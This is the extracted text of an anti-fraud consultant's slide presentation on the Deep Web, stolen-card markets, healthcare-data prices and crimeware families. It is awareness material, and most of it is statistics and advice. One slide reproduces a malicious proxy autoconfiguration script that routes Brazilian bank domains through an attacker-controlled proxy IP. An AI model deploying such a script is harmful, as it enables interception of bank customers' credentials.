What’s lurking in the deep end of the Internet?

The Deep Web

Joshua Schleicher

Anti-Fraud Solutions Consultant

info@easysol.net

95% of the ocean remains unexplored, unseen by human eyes

http://oceanservice.noaa.gov/facts/exploration.html

Just like an iceberg, the majority of the Deep Web remains obscured from view

Google has only indexed 200TB of the Internet's data...an estimated .004% of the total Internet

Source: https://hewilson.wordpress.com/what-is-the-deep-web/statistics/

Source: http://money.cnn.com/infographic/technology/what-is-the-deep-web/

These search engines capture < 1% of all web content

Source: http://money.cnn.com/infographic/technology/what-is-the-deep-web/

The Deep Web

The Deep Web is truly anonymous– you can’t even get on it unless you yourself are anonymous

Users can buy virtually anything from drugs to credit card information and accounts

Public interest about the

Deep Web is at an all-time

high with sites receiving

50% more monthly traffic

than surface sites

Source: http://www.sickchirpse.com/deep-web-guide/2/

The recent evolution of the Deep Web has allowed fraud to become increasingly commoditized, simply because there are many ways to monetize the fraud process itself.

The Process

Information Theft

Black Market Sale

Cybercrime Platforms

> Data Stealer SDK

> VOLK

> Webshells

> Zeus

> SpyEye

> Citadel

> ICE IX

> BlackHole Exploit Kit

> iBanking (Mobile Botnet)

> Malware Targeting POS

Mobile Crimeware Platforms are being used to harvest credentials to infiltrate accounts.

PAC (Proxy Autoconfiguration) Attacks

function FindProxyForURL(url, host){// ---- Santander if (shExpMatch(host, "www.santander.com.br")) {

return "PROXY 201.20.46.177:80";

} if (shExpMatch(host, "santander.com.br")) {

return "PROXY 201.20.46.177:80";

} if (shExpMatch(host, "www.banespa.com.br")) {

return "PROXY 201.20.46.177:80";

} if (shExpMatch(host, "banespa.com.br")) {

return "PROXY 201.20.46.177:80";

}}

Fraudsters have succeeded at breaching big-name merchants

The Process

Information Theft

Black Market Sale

Easy Checkout

.

Customer Support

.

Money Back Gurantee

Technical Support

Shopping Online with the Deep Web

The Hidden WikiResource for finding hacking databases and credit card sale sites

Online Card Shops

Factors affecting Price:• Validity Rate• Supply and Demand• Issuing Region

How much is a card worth?

Source: http://krebsonsecurity.com/2014/02/fire-sale-on-cards-stolen-in-target-breach/

How much is Healthcare data worth?

In 2015 – The cost of just one Medicare number, $470

Source: http://www.npr.org/sections/alltechconsidered/2015/02/13/385901377/the-black-market-for-stolen-health-care-data

Cashing In

Image Source: http://www.tripwire.com/state-of-security/vulnerability-management/how-stolen-target-credit-cards-are-used-on-the-black-market/

Silk RoadThe most famous online drug market that was shut down in 2013 by the FBI

Down the Rabbit Hole, The Front Door

Welcome to the Jungle

Welcome to the Jungle

Welcome to the Jungle

Welcome to the Jungle

IRS & the Federal Office of Personnel Management recently fell victim to breaching and Deep Web information trading.

Welcome to the Jungle

My Two Cents• Tackle the problem from beginning to end• Look for constant innovation• Speed and flexibility are critical when fighting back fraud• Ask for references – especially when something bad hap-

pens• There is no silver bullet

Questions?

Joshua Schleicher

Anti-Fraud Solutions Consultant

info@easysol.net